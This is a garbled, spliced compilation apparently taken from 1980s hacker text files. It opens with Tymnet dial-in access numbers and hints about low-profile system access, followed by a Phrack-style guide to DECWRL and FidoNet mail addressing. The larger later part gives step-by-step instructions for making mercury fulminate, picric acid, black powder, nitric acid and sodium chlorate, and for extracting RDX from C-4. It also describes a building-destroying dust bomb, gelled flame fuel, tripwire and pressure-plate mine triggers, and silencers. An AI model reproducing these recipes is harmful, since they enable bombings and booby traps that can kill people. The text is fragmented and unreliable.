THE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LINE 12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LCOME TO PPS:  415-XXX-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_3 _1 _0 _6 _9 _             (TYMNET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ES NOT ECHO UNTIL TYMNET RESPO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WY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DAS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UTHWESTERN B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DE    CITY                  STATE           DENSITY  ACCESS NUMBERS NW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KANSAS CITY           KANSAS          300/1200 316/225-9951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HAYS                  KANSAS          300/1200 913/625-810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HUTCHINSON            KANSAS          300/1200 316/669-1052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LAWRENCE              KANSAS          300/1200 913/841-558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MANHATTAN             KANSAS          300/1200 913/539-9291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PARSONS               KANSAS          300/1200 316/421-062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SALINA                KANSAS          300/1200 913/825-4547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TOPEKA                KANSAS          300/1200 913/235-1909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WICHITA               KANSAS          300/1200 316/269-1996   @MRL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4766   BRIDGETON/ST. LOUIS   MISSOURI        300/1200 314/622-090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4766   ST. LOUIS             MISSOURI        300/1200 314/622-0900   @MRL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ADA                   OKLAHOMA        300/1200 405/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side note, the recent book The Cuckoo's Egg provides some intere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in the form of a story, however) on a Tymnet hacker.  Reme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he was into BIG things, and hence he was cracked down upon.  If you keep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 profile, networks should provide a good access meth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can find a system that is connected to the Internet that you can get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ymnet, you are doing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_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ack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olume Three, Issue 30, File #5 of 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DECWRL Mail Gate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y Dedicated L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September 20, 198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WRL is a mail gateway computer operated by Digital's Western Resear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oratory in Palo Alto, California.  Its purpose is to support the inter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electronic mail between Digital and the "outside wor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WRL is connected to Digital's Easynet, and also to a number of differ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side electronic mail networks.  Digital users can send outside mail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ing to DECWRL::"outside-address", and digital users can also receive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having your correspondents route it through DECWRL.  The details of incom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 are more complex, and are discussed be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vitally important that Digital employees be good citizens of the netwo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which we are connected.  They depend on the integrity of our user commun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ensure that tighter controls over the use of the gateway are not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important rule is "no chain letters," but there are other ru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ending on whether the connected network that you are using is commercial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commerc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rrent traffic volume (September 1989) is about 10,000 mail messages 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y and about 3,000 USENET messages per day.  Gatewayed mail traffic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ubled every year since 1983.  DECWRL is currently a Vax 8530 computer with 4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gabytes of main memory, 2500 megabytes of disk space, 8 9600-baud (Teleb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m ports, and various network connections.  They will shortly be upgra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 Vax 8650 system.  They run Ultrix 3.0 as the base operating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ateway has engineering staff, but no administrative or clerical sta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ork hard to keep it running, but they do not have the resources to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queries or provide tutorials in its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post periodic status reports to the USENET newsgroup dec.general.  Vari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pful people usually copy these reports to the VAXNOTES "gateways" con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in a day or tw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SEND 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WRL is connected to quite a number of different mail networks.  If you w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ged on directly to it, you could type addresses directly, e.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strange!foreign!add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ince you are not logged on directly to the gateway, you must send mail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en it arrives at the gateway, it will be sent as if that address h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n typed local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ending from V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are a VMS user, you should use NMAIL, because VMS mail does not know h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queue and retry mail when the network is congested or disconnected.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MS, address your mail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nm%DECWRL::"strange!foreign!add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quote characters (") are important, to make sure that VMS doesn't tr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pret strange!foreign!address itself.  If you are typing such an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ide a mail program, it will work as advertised.  If you are using DCL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ing directly to the command line, you should beware that DCL likes to remo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otes, so you will have to enclose the entire address in quotes, and then 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quotes in every place that one quote should appear in the add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mail test.msg "nm%DECWRL::""foreign!addr""" /subj="hell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e three quotes in a row after foreign!addr.  The first two of them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ubled to produce a single quote in the address, and the third end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 itself (balancing the quote in front of the n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some typical outgoing mail addresses as used from a VMS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nm%DECWRL::"lll-winkin!netsys!phr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nm%DECWRL::"postmaster@msp.pnet.sc.ed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nm%DECWRL::"netsys!phrack@uunet.uu.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nm%DECWRL::"phrackserv@CUNYVM.bit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nm%DECWRL::"Chris.Jones@f654.n987.z1.fidonet.or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ending from Ultr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 Ultrix system has been configured for it, then you can, from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trix system, just send directly to the foreign address, and the mail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ake care of all of the gateway routing for you.  Most Ultrix system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porate Research and in the Palo Alto cluster are configured this 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ind out whether your Ultrix system has been so configured, just try i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what happens.  If it doesn't work, you will receive notification alm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ant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The Ultrix mail system is extremely flexible; it is alm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pletely configurable by the customer.  While this is valuabl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ustomers, it makes it very difficult to write global instruction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use of Ultrix mailers, because it is possible that the local chan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ve produced something quite unlike the vendor-delivered mailer.  On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opular changes is to tinker with the meaning of quote charact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Ultrix addresses.  Some systems consider that these two address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s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te1!site2!user@host.dec.c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te1!site2!user"@host.dec.c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ile others are configured so that one form will work and the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ll not.  All of these examples use the quotes.  If you have trou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tting the examples to work, please try them again without the qu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haps your Ultrix system is interpreting the quotes different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 Ultrix system has an IP link to Palo Alto (type "/etc/p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wrl.dec.com" to find out if it does), then you can route your mail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teway via IP.  This has the advantage that your Ultrix mail headers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ch the gateway directly, instead of being translated into DECNET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ers and then back into Ultrix at the other end.  Do this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alien!address"@decwrl.dec.c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quotes are necessary only if the alien address contains a ! character,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don't hurt if you use them unnecessarily.  If the alien address conta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 character, you will need to change it into a "%" character.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 to send via IP to joe@widget.org, you should address the m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joe%widget.org"@decwrl.dec.c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 Ultrix system has only a DECNET link to Palo Alto, then you sh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 mail in much the same way that VMS users do, save that you should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the nm% in front of the add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DECWRL::"strange!foreign!add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some typical outgoing mail addresses as used from an Ultrix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has IP access.  Ultrix systems without IP access should use the s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ntax as VMS users, except that the nm% at the front of the address should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lll-winken!netsys!phrack"@decwrl.dec.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postmaster%msp.pnet.sc.edu"@decwrl.dec.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phrackserv%CUNYVM.bitnet"@decwrl.dec.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netsys!phrack%uunet.uu.net"@decwrl.dec.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Chris.Jones@f654.n987.z1.fidonet.org"@decwrl.dec.c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AILS OF USING OTHER NETWOR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the world's computer networks are connected together, more or less,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hard to draw exact boundaries between them.  Precisely where the Inter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s and UUCP begins is a matter of interpre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purposes of sending mail, though, it is convenient to divide the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verse into these catego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ynet         Digital's internal DECNET network.  Characterized by addre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form NODE::USER.  Easynet can be used for commerc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urpo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et        A collection of networks including the old ARPAnet, the NSF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CSnet, and others.  Most international resear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velopment, and educational organizations are connect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me fashion to the Internet.  Characterized by addresse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form user@site.subdomain.domain.  The Internet it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nnot be used for commercial purpo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UCP            A very primitive network with no management, built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uto-dialers phoning one computer from another.  Characteriz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y addresses of the form place1!place2!user.  The UUCP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n be used for commercial purposes provided that non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tes through which the message is routed objects to th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NET          Not a network at all, but a layer of software built on top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UCP and Inter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TNET          An IBM-based network linking primarily educational si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gital users can send to BITNET as if it were par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ternet, but BITNET users need special instruction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versing the process.  BITNET cannot be used for commerc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urpo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donet         A network of personal computers.  I am unsure of the statu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ing Fidonet for commercial purposes, nor am I sure of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fficac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MAINS AND DOMAIN ADDRES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 particular network called "the Internet;" it is somewhat relat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used to be "the ARPAnet."  The Internet style of addressing is flexi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that people use it for addressing other networks as well,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ult that it is quite difficult to look at an address and tell just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it is likely to traverse.  But the phrase "Internet address" doe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 "mail address of some computer on the Internet" but rather "mail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style used by the Internet."  Terminology is even further conf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word "address" means one thing to people who build network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hing entirely different to people who use them.  In this file an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something like "mike@decwrl.dec.com" and not "192.1.24.177" (which is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engineers would call an "internet add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ternet naming scheme uses hierarchical domains, which despite their ti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just a bookkeeping trick.  It doesn't really matter whether you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DE::USER or USER@NODE, but what happens when you connect two compan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s together and they both have a node ANCHOR??  You must, someh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y which ANCHOR you mean.  You could say ANCHOR.DEC::USER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ANCHOR::USER or USER@ANCHOR.DEC or USER@DEC.ANCHOR.  The Inter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ntion is to say USER@ANCHOR.DEC, with the owner (DEC) after the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CH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re could be several different organizations named DEC.  You could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ital Equipment Corporation or Down East College or Disabled Edu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ittee.  The technique that the Internet scheme uses to resolve conflic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this is to have hierarchical domains.  A normal domain isn't DEC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NFORD, but DEC.COM (commercial) and STANFORD.EDU (educational).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mains can be further divided into ZK3.DEC.COM or CS.STANFORD.EDU.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esn't resolve conflicts completely, though:  both Central Michigan Univers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arnegie-Mellon University could claim to be CMU.EDU.  The rule is t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ner of the EDU domain gets to decide, just as the owner of the CMU.EDU g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ecide whether the Electrical Engineering department or the Element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ucation department gets subdomain EE.CMU.ED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omain scheme, while not perfect, is completely extensible.  If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addresses that can potentially conflict, you can suffix some domain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 of them, thereby making, say, decwrl.UUCP be somehow different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WRL.E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WRL's entire mail system is organized according to Internet domains, an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ct we handle all mail internally as if it were Internet mail.  Incoming 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converted into Internet mail, and then routed to the appropriate domain;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domain requires some conversion, then the mail is converted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irements of the outbound domain as it passes through the gateway.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 they put Easynet mail into the domain ENE           STATE           DENSITY  ACCESS NUMBER  NTW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BERKELEY              CALIFORNIA      300/1200 415-548-2121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EL SEGUNDO            CALIFORNIA      300/1200 213-640-8548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FULLERTON             CALIFORNIA      300/1200 714-441-2777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INGLEWOOD             CALIFORNIA      300/1200 213-216-7667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LOS ANGELES(DOWNTOWN) CALIFORNIA      300/1200 213-687-3727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LOS ANGELES           CALIFORNIA      300/1200 213-480-1677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MOUNTAIN VIEW         CALIFORNIA      300/1200 415-960-3363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OAKLAND               CALIFORNIA      300/1200 415-893-9889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PALO ALTO             CALIFORNIA      300/1200 415-325-4666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PASADENA              CALIFORNIA      300/1200 818-356-0780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SAN FRANCISCO         CALIFORNIA      300/1200 415-543-8275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SAN FRANCISCO         CALIFORNIA      300/1200 415-626-5380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SAN FRANCISCO         CALIFORNIA      300/1200 415-362-2280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306   SAN JOSE              CALIFORNIA      300/1200 408-920-0888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SANTA ANNA            CALIFORNIA      300/1200 714-972-9844   @P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272   VAN NUYS              CALIFORNIA      300/1200 818-780-1066   @P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PS   PACIFIC BELL - NETWORK NAME IS PUBLIC PACKET SWITCHING (P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ECT ME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 _. _&lt; _C _R _             (SYNCHRONIZES DATA SPEED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ES NOT ECHO TO THE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LINE 12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LCOME TO PPS:  415-XXX-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_3 _1 _0 _6 _9 _             (TYMNET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ES NOT ECHO UNTIL TYMNET RESPO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WY 0XXXX- TYMNET: PLEASE LOG IN:  (HOST # WITHIN DAS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UTHWESTERN B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DE    CITY                  STATE           DENSITY  ACCESS NUMBERS NW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KANSAS CITY           KANSAS          300/1200 316/225-9951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HAYS                  KANSAS          300/1200 913/625-810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HUTCHINSON            KANSAS          300/1200 316/669-1052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LAWRENCE              KANSAS          300/1200 913/841-558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MANHATTAN             KANSAS          300/1200 913/539-9291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PARSONS               KANSAS          300/1200 316/421-062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SALINA                KANSAS          300/1200 913/825-4547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TOPEKA                KANSAS          300/1200 913/235-1909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5443   WICHITA               KANSAS          300/1200 316/269-1996   @MRL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4766   BRIDGETON/ST. LOUIS   MISSOURI        300/1200 314/622-090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4766   ST. LOUIS             MISSOURI        300/1200 314/622-0900   @MRL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ADA                   OKLAHOMA        300/1200 405/436-0252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ALTUS                 OKLAHOMA        300/1200 405/477-0321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ALVA                  OKLAHOMA        300/1200 405/327-1441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ARDMORE               OKLAHOMA        300/1200 405/223-8086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167   BARTLESVILLE          OKLAHOMA        300/1200 918/336-6901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CLINTON               OKLAHOMA        300/1200 405/323-8102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DURANT                OKLAHOMA        300/1200 405/924-268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ENID                  OKLAHOMA        300/1200 405/242-8221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LAWTON                OKLAHOMA        300/1200 405/248-8772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167   MCALESTER             OKLAHOMA        300/1200 918/426-090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167   MIAMI                 OKLAHOMA        300/1200 918/540-1551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167   MUSKOGEE              OKLAHOMA        300/1200 918/683-1114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OKLAHOMA CITY         OKLAHOMA        300/1200 405/236-066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PONCA CITY            OKLAHOMA        300/1200 405/762-9926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167   SALLISAW              OKLAHOMA        300/1200 918/775-7713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SHAWNEE               OKLAHOMA        300/1200 405/273-0053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STILLWATER            OKLAHOMA        300/1200 405/377-5500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167   TULSA                 OKLAHOMA        300/1200 918/583-6606   @MRL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6510   WOODWARD              OKLAHOMA        300/1200 405/256-9947   @MRL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RLK - SOUTHWESTERN BELL TELEPHONE- NETWORK NAME IS MICROLINK II(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ECT MES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LEASE TYPE YOUR TERMINAL IDENTIFI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_                  (YOUR TERMINAL IDENTIFI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LCOME TO MICROLINK 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XXX:01-03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LEASE LOG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 &lt; _C _R _&gt; _            (USERNAME TO ACCESS TYM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ST: CALL CONNEC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WY 0XXXX- TYMNET: PLEASE LOG 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UTHERN NEW ENGL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DE    CITY                  STATE           DENSITY  ACCESS NUMBERS NW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BRIDGEPORT            CONNECTICUT     300/2400 203/366-6972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BRISTOL               CONNECTICUT     300/2400 203/589-5100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CANAAN                CONNECTICUT     300/2400 203/824-5103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CLINTON               CONNECTICUT     300/2400 203/669-4243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DANBURY               CONNECTICUT     300/2400 203/743-2906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DANIELSON             CONNECTICUT     300/2400 203/779-1880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HARTFORD/MIDDLETOWN   CONNECTICUT     300/2400 203/724-6219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MERIDEN               CONNECTICUT     300/2400 203/237-3460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NEW HAVEN             CONNECTICUT     300/2400 203/776-1142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NEW LONDON            CONNECTICUT     300/2400 203/443-0884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NEW MILFORD           CONNECTICUT     300/2400 203/355-0764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NORWALK               CONNECTICUT     300/2400 203/866-5305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OLD GREDDWICH         CONNNETICUT     300/2400 203/637-8872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OLD SAYBROOK          CONNECTICUT     300/2400 203/388-0778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SEYMOUR               CONNECTICUT     300/2400 203/881-1455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STAMFORD              CONNECTICUT     300/2400 203/324-9701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STORRS                CONNECTICUT     300/2400 203/429-4243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TORRINGTON            CONNECTICUT     300/2400 203/482-9849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WATERBURY             CONNECTICUT     300/2400 203/597-0064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WILLIMANTIC           CONNECTICUT     300/2400 203/456-4552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WINDSOR               CONNECTICUT     300/2400 203/688-9330   @CON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7   WINDSOR LCKS/ENFIELD  CONNECTICUT     300/2400 203/623-9804   @CONN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NET - SOUTHERN NEW ENGLAND TELEPHONE - NETWORK NAME IN CONN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ECT ME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_ H_ &lt;_ C_ R_&gt;        (SYNCHRONIZES DATA SP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ES NOT ECHO TO THE TERM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N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 T_ &lt;_ C_ R_&gt;_         (MUST BE CAPITAL LET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6-SEP-88   18:33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31069                     (ADDRESS CONFI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                        (CONFIRMATION OF CALL SET-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WY OXXXX-TYMNET: PLEASE LOG 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side note, the recent book The Cuckoo's Egg provides some intere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in the form of a story, however) on a Tymnet hacker.  Reme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he was into BIG things, and hence he was cracked down upon.  If you keep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 profile, networks should provide a good access meth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can find a system that is connected to the Internet that you can get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ymnet, you are doing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_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name@f&lt;node #&gt;.n&lt;net #&gt;.z&lt;zone #&gt;.ifna.or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ther words, if I wanted to mail to Silicon Swindler at 1:135/5, the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be Silicon_Swindler@f5.n135.z1.ifna.org and, provided that your mail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s the .ifna.org domain, it should get through alright.  Apparently, a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riting of this article, they have implemented a new gateway name ca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donet.org which should work in place of ifna.org in all routings.  If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er does not know either of these domains, use the above routing but re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rst "@" with a "%" and then afterwards, use either of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lers after the "@":  CS.ORST.EDU or K9.CS.ORST.EDU (i.e. username%f&lt;n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n&lt;net #&gt;.z&lt;zone #&gt;.fidonet.org@CS.ORST.EDU [or replace CS.ORST.EDU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9.CS.ORST.ED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is a list compiled by Bill Fenner (WCF@PSUECL.BITNET) that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ted on INFONETS DIGEST which lists a number of FIDONET gatewa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      Node    Node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4      56      milehi.ifna.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5      55      casper.ifna.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7      320     rubbs.ifna.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9      661     blkcat.ifna.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5      406     fidogate.ifna.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8      19      hipshk.ifna.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9      65      insight.ifna.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43      N/A     fidogate.ifna.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52      200     castle.ifna.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61      N/A     fidogate.ifna.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69      17      megasys.ifna.or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e UUCP equivalent node name is the first part of the node nam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ther words, the UUCP node milehi is listed as milehi.ifna.org but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 mailed directly over the UUCP ne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way to mail to FIDONET, specifically for Internet people, is in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hnp4!necntc!ncoast!ohiont!&lt;net #&gt;!&lt;node #&gt;!user_name@husc6.harvard.ed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for those UUCP mailing people out there, just use the path describe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gnore the @husc5.harvard.edu portion. There is a FIDONET NODELIST available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any FIDONET bulletin board, but it is quite l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TY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ly known as Tymnet, OnTyme is the McDonnell Douglas revision.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ought out Tymnet, they renamed the company and opened an experiment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et gateway at ONTYME.TYMNET.COM but this is supposedly only goo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ain corporate addresses within McDonnell Douglas and Tymnet, not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stomers.  The userid format is xx.yyy or xx.y/yy where xx is a net nam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yy (or y/yy) is a true username.  If you cannot directly nail this, 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x.yyy%ONTYME.TY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ium Chlorat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odium Chlorate is a strong oxidizer used in the manufactur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osives. It can be used in place of Potassium Chlo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                            Sour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carbon or lead rods (1 in. diameter        Dry Cell Batte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5 in. long)                               (2-1/2 in. diameter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 long) or plumb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pply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t, or ocean water                         Grocery store or oce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lfuric acid, diluted                       Motor Vehicle Batte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Vehic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wires, 16 gauge (3/64 in. diameter approx.), 6 ft. long, insul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so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gallon glass jar, wide mouth (5 in. diameter by 6 in. high appr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aspo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vy clo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rge flat pan or tr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Mix 1/2 cup of salt into the one gallon glass jar with 3 litres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rts) of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Add 2 teaspoons of battery acid to the solution and stir vigorous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5 minu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Strip about 4 inches of insulation from both ends of the two wi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With knife and sticks, shape 2 strips of wood 1 by 1/8 by 1-1/2. T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ood strips to the lead or carbon rods so that they are 1-1/2 inc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Connect the rods to the battery in a motor vehicle with the insul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Submerge 4-1/2 inches of the rods in the salt water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 With gear in neutral position, start the vehicle engine. Depres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lerator approx. 1/5 of its full trav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 Run the engine with the accelerator in this position for 2 hours,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ut it down for 2 hou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9) Repeat this cycle for a total of 64 hours while maintaining the lev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acid-salt water solution in the glass j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This arrangement employs voltages which can be quite danger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not touch bare wire leads while engine is run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0) Shut off the engine. Remove the rods from the glass jar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onnect wire leads from the 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1) Filter the solution through the heavy cloth into a flat pan or tr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e sediment at the bottom of the glass j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2) Allow the water in the filtered solution to evaporate at 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mperature (approx. 16 hours). The residue is approximately 60% or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dium chlorate which is pure enough to be used as an explos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gredi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rcury Fulminat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rcury Fulminate is used as a primary explosive in the fabr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detonators. It is to be used with a booster explosive such as picr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id or RDX (which are elsewhere in this Cookboo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tric Acid, 90% conc. (1.48 sp. gr)              Elsewhere in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okbook, or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dustrial met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ss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rcury                                           Thermomet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rcury switc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ld radio tub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hyl (grain) alcohol (9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tering material                                Paper towe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aspoon measure (1/4, 1/2. and 1 ts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pacity)-aluminum, stainless ste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wax co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n wooden st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n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ss contain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rin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Dilute 5 teaspoons of nitric acid with 2-1/2 teaspoons of clean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glass container by adding the acid to the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Dissolve 1/8 teaspoon of mercury in the diluted nitric acid.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l yield dark red fumes. NOTE: It may be necessary to add water,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op at a time, to the mercury-acid solution in order to start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Acid will burn skin and destroy clothing. If any is spil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h it away with a large quantity of water. Do NOT inhale fu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Warm 10 teaspoons of the alcohol in a container until the alcoh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s warm to the inside of the w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Pour the metal-acid solution into the warm alcohol. Reaction shou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rt in less than 5 minutes. Dense white fumes will be given off du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action. As time lapses, the fumes will become less dense. Allow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15 minutes to complete reaction. Fulminate will settle to the bott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This reaction generates large quantities of toxic, flamm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mes. The process MUST be conducted outdoors or in a well-ventil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away from sparks or open flames. DO NOT inhale fu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Filter the solution through a paper towel into a container. Crysta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 stick to the side of the container. If so, tilt and squirt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wn the sides of the container until all of the material collects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lter pa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Wash the crystals with 6 teaspoons of ethyl alcoh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Allow these mercury fulminate crystals to air d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Handle dry explosive with great care. Do not scrape or hand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roughly! Keep away from sparks or open flames. Store in a cool, d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rovised Black Powder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lack powder can be prepared in a simple, safe manner. It may be used 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sting or gun pow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ssium Nitrate, granulated, 3 cups (3/4 li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od charcoal, powdered, 2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lfur, powdered, 1/2 c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cohol, 5 pints (2-1/2 liters) (whiskey, rubbing alcohol,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3 cups (3/4 li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buckets - each 2 gallon (7-1/2 litres) capacity, at least one of which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at resistant (metal, ceramic,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t window screening, at least 1 foot (30 cm) squ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rge wooden st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th, at leat 2 feet (60 cm) squ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Place alcohol in one of the bu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Place potassium nitrate, charcoal, and sulfur in the heat resi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cket. Add 1 cup water and mix thoroughly with wooden stick until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grediants are dissol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Add remaining water (2 cups) to mixture. Place bucket on heat sourc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r until small bubbles begin to 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DO NOT boil mixture. Be sure ALL mixture stays wet. If any is d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on sides of pan, it may ign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Remove bucket from heat and pour mixture into alcohol while stir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gorous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Let alcohol mixture stand about 5 minutes. Strain mixture through cloth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btain black powder. Discard liquid. Wrap cloth around black powder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queeze to remove all excess liqu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 Place screening over dry bucket. Place workable amount of damp powder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reen and granulate by rubbing solid through screen. NOTE: If granul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ticles appear to stick together and change shape, recombine entire ba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owder and repeat steps 5 &amp;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 Spread granulated black powder on flat, dry surface so that layer ab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2 inch (1-1/4 cm) is formed. Allow to dry. Use radiator, or dir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nlight. This should be dried as soon as possible, preferably in an h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nger the drying period, the less effective the black pow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Remove from heat AS SOON AS granules are dry. Black powder is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y to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tric Acid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itric Acid is used in the preparation of many explosives, incedia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xtures, and acid delay timers. It may be prepared by distilling a mix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otassium nitrate and concentrated sulfuric ac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                                 Sour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ssium Nitrate (2 parts by volume)             Elsewhere in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okbook, or drug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ENTRATED sulfuric acid (1 part by volume)     Motor vehicle batte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dustrial pla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bottles or ceramin jugs (narrow neck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efer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 or frying p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 source (wood, charcoal, or co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pe (paper, electrical, masking, but NOT cellopha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per or ra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ANT: If sulfuric acid is obtained from a motor vehicle batt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entrate it by boiling it UNTIL white fumes appear. DO NOT INHALE FU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The amount of nitric acid produced is th same as the amount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tassium nitrate. Thus, for two tablespoons of nitric acid, use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spoons of potassium nitrate and 1 tablespoonful of concentrated sulfur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Place dry potassium nitrate in bottle or jug. Add sulfuric acid. Do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the bottle more than 1/4 full. Mix until paste is form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TION: DO NOT INHALE FU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Wrap paper or rags around necks of two bottles. securly tape necks of tw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tles together. Be sure that bottles are flush against each other and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no air spa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Support bottles on rocks or cans so that empty bottle is SLIGHTLY lo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 bottle containing paste so that nitric acid that is formed in receiv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ttle will not run into other bo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Build fire in pot or frying p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Gently heat bottle containing mixture by gently moving fire in and out. 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d fumes begin to appear periodically pour cool water over empty receiv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ttle. Nitric acid will befin to form in receiving bott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Do not overheat or wet bottle containing mixture or it may sha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an added precaution, place bottle to be heated in heat resistant contain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ed with sand or gravel. Heat this outer container to produce nitric ac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 Continue the above process until no more red fumes are formed. I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tric acid formed in the receiving bottle is not clear (cloudy) pour it in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ned bottle and repeat steps 2-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Nitric acid should be ket away from all combustables and should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pt in a SEALED CERAMIC OR GLASS container. DO NOT inhale fu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st Bomb Instruction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n initiator which will initiate common material to produce d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plosions can be rapidly and easily constructed. This type of charge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al for the destruction of enclosed areas such as rooms or build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lat can, 3 in. (8 cm) in diameter and 1-1/2 in. (3-3/4 cm) high. A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ounce tuna can serves the purpose quite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sting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os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um (may be wire, cut sheet, flattened can, or pow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rge nail, 4 in. (10 cm)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oden rod - 1/4 in. (6 mm) dia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ur, gasoline, and powder or chipped alumin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Plastic explosive produce better explosions than cast explos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Using the nail, press a hole through the side of the tuna can 3/8 in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1/2 inch (1 to 1-1/2 cm) from the bottom. Using a rotating and l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on, enlarge the hole until it will accomodate the blasting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Place the wooden rod in the hole and position the end of the rod at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er of the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Press explosive into the can, being sure to surround the rod, until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3/4 inch (2 cm) from the top of the can. Carefully remove the woo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Place the aluminum metal on top of the explos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Just before use, insert the blasting cap into the cavity made by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d. The initiator is now ready to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If it is desired to carry the initiator some distance, cardboard m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pressed on top of the aluminum to insure against loss of mater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is particular unit works quite well to initiate charges of f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unds of flour, 1/2 gallon (1-2/3 litres) of gasoline, or two pound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ke painters aluminum. The solid materials may merely be contained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cks or cardboard cartons. The gasoline may be placed in plastic co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per milk cartons, as well as plastic or glass bottles. The charges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aced directly on top of the initiator and the blasting cap is actu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lectrically or by a fuse depending on the type of cap employed. this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roy a 2,000 cubic feet enclosure (building 10 x 20 x 10 fe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For larger enclosures, use proportionally larger initiator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on-Tet Explosiv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moist explosive mixture can be made from fine aluminum powder combi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carbon tetrachloride or tetrachloroethylene. This explosive can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onated with a blasting ca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e aluminum bronzing powder                     Paint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on Tetrachloride                              Pharmacy, or f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extinguisher flu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trachloroethylene                               Dry cleaners, pharma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rring rod (w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xing container (bowl, bucket,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suring container (cup, tablespoon,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age container (jar, can,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sting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pe, can or j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Measure out two parts aluminum powder to one part carbon tetrachloride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trachlorethylene liquid into mixing container, adding liquid to pow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stirring with the wooden r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Stir until the mixture becomes the consistency of honey syr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TION: Fumes from the liquid are dangerous and should not be inhal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Store explosive in a jar or similar water proof container until ready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e liquid in the mixture evaporates quicky when not confin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Mixture will detonate in this manner for a period of 72 ho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Pour this mixture into an iron or steel pipe which has an end cap threa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one end. If a pipe is not available, you may use a dry tin can or gla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Insert blasting cap just beneath the surface of the explosive m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Confining the open end of the container will add to the effective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explos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ing Picric Acid from Aspirin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icric Acid can be used as a booster explosive in detonators, a hi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osive charge, or as an intermediate to preparing lead pic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pirin tablets (5 grains per tabl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cohol, 95% p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lfuric acid, concentrated, (if battery acid, boil until white fum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app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ssium Nitrate (see elsewhere in this Cookb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per towe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ning jar, 1 p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d (glass or w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ss contain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amic or glass di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aspo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spo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Crush 20 aspirin tablets in a glass container. Add 1 teaspoon of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ork into a pas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Add approximately 1/3 to 1/2 cup of alcohol (100 millilitres)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pirin paste; stir while pou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Filter the alcohol-aspirin solution through a paper towel into an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ss container. Discard the solid left in the paper tow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Pour the filtered solution into a glass or ceramic di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Evaporate the alcohol and water from the solution by placing the d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o a pan of hot water. White powder will remain in the dish af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apo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The water in the pan should be at hot bath temperature, not boi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rox. 160 to 180 degress farenheit. It should not burn the h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 Pour 1/3 cup (80 millilitres) of concentrated sulfuric acid into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ning jar. Add the white powder to the sulfuric ac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 Heat canning jar of sulfuric acid in a pan of simmering hot water ba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15 minutes; then remove jar from the bath. Solution will turn to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llow-orange col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 Add 3 level teaspoons (15 grams) of potassium nitrate in three por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the yellow-orange solution; stir vigorously during additions. Solu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urn red, then back to a yellow-orange col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9) Allow the solution to cool to ambient room temperature while stir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ccasion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0) Slowly pour the solution, while stirring, into 1-1/4 cup (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llilitres) of cold water and allow to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1) Filter the solution through a paper towel into a glass container.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llow particles will collect on the paper tow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2) Wash the light yellow particles with 2 tablespoons (25 millilitre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Discard the waste liquid in the contai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3) Place articles in ceramic dish and set in a hot water bath, as in st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for 2 ho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lamation of RDX from C-4 Explosive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DX can be obtained from C-4 explosives with the use of gasoline. It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used as a booster explosive for detonators or as a high explosive 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so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4 explos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 pint glass jars, wide mou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per towe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rring rod (glass or w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amic or glass di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aspo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Water, Ceramic or glass dish, pan, &amp; heat source are all optional.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DX can be air dried inste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Place 1-1/2 teaspoons (15 grams) of C-4 explosive in one of the pint j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 1 cup (240 milliliters) of gaso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These quantities can be increased to obtain more RDX. For example, use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llons of gasoline per 1 cup of C-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Knead and stir the C-4 with the rod until the C-4 has broken down into sm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icles. Allow mixture to stand for 1/2 h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Stir the mixture again until a fine white powder remains on the bottom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j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Filter the mixture through a paper towel into the other glass jar. Wash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ticles collected on the paper towel with 1/2 cup (120 milliliter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soline. Discard the waste liqu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Place the RDX particles in a glass or ceramic dish. Set the dish in a pa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t water, not boiling and dry for a period of 1 hou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e RDX particles may be air dried for a period of 2 to 3 ho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gg-based Gelled Flame Fuel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 white of any bird egg can be used to gel gasoline for use a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me fuel which will adhere to target surf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s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ume               Ingredient              How used        Common Sour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5                   Gasoline                Motor Fuel      Gas St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ove Fuel      Motor Vehic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lv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4                   Egg Whites              Food            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dustrial      Far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s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one of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able Salt              Food            Sea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dustrial      Natural Br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sses     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Ground Coffee           Food            Coffee Pl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Dried Tea Leaves        Food            Tea Pl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Cocoa                   Food            Cacao T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Sugar                   Sweetening      Sugar Ca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ods         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Saltpeter               Pyrotechnics    Natu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Explosives        Depos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itrate)                Matches         Drug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dic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Epsom Salts             Medicine        Natu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neral Water   Kisser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dustrial      Drug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sses     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Washing Soda            Washing Cleaner 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al Soda)              Medicine        Drug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otography     Photo Supp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1/2                Baking Soda             Baking          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nufacturing   Drug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Bevera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dic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n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a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1/2                Aspirin                 Medicine        Drug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Make sure that ther are no open flames in the area when mix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me fuels! NO SMOK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Seperate the egg white from the yolk. This can be done by breaking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gg into a dish and carefully removing the yolk with a spo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Pour egg white into a jar, bottle, or other container, and add gaso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Add the salt (or other additive) to the mixture and stir occasion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gel forms (about 5 to 10 minu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A thicker gelled flame fuel can be obtained by putting the capped j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hot (65 degrees Centegrade) water for about 1/2 hour and then let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m cool to room temperature. (DO NOT HEAT THE GELLED FUEL CONTAI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FFE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thespin Switch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spring type clothespin is used to make a circuit closing switch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uate explosive charges, mines, booby traps, and alarm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g type clothesp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d copper wire -- 1/16 in. (2 mm) in dia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ong string on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t piece of wood (roughly 1/8 x 1" x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if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Strip four in. (10 cm) of insulation from the ends of 2 solid cop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res. Scrape the copper wires with pocket knife until the metal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i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Wind one scraped wire tightly on jaw of the clothespin, and the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re on the other ja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Make a hole in one end of the flat piece of wood using a knife, he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il or dr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Tie strong string or wire through the h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Place flat piece of wood between the jaws of the clothespin swi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 Firing Circu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nitiator   |----------\                |      str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tw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clothesp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att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hen the flat piece of wood is removed by pulling the string,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ws of the clothespin will close, completing the circ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UTION: Do not attach the battery until the switch and trip wire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en emplaced and examined. Be sure that the flat piece of wood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perating the jaws of the swi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exible Plate Switch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is flexible plate switch is used for initiating emplaced mine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os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flexible metal she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e approximately 10 in. (25 cm) squ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e approximately 10 in. x 8 in. (20 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ce of wood 10 in. square x 1 in. th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r soft wood blocks 1 in. x 1 in. x 1/4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ght flat head nails, 1 in.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ng wi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hesive ta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Nail 10 in. by 8 in. metal sheet to 10 in. square piece of wood so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in. of wood shows on each side of the metal. Leave one of the nai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ing up about 1/4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Strip insulation from the end of one connecting wire. Wrap this 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the nail and drive the nail all the way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Place the four wood blocks on the corners of the wood b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Place the 10 in. square flexible metal sheet so that it rests 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s in line with the wood b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Drive four nails through the metal sheet and the blocks (1 per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fasten the sheet to the wood base. A second connecting wire is atach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ne of the nails as in step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 Wrap the adhesive tape around the edges of the plate and wood b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will assure that no dirt or other foreign matter will get betwee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tes and prevent the switch from opera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witch is placed in a hole in the path of expected traffic and cov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a thin layer of dirt or other camouflaging material. The mine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ther explosive device connected to the switch can be buried with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 or emplaced elsewhere as desi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a vehicle passes over the switch, the two metal plates make conta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sing the firing circ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 Signature Systems (Silencer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ow signature systems (silencers) for improvised small arms weap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be made from steel gas or water pipe and fitt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nade 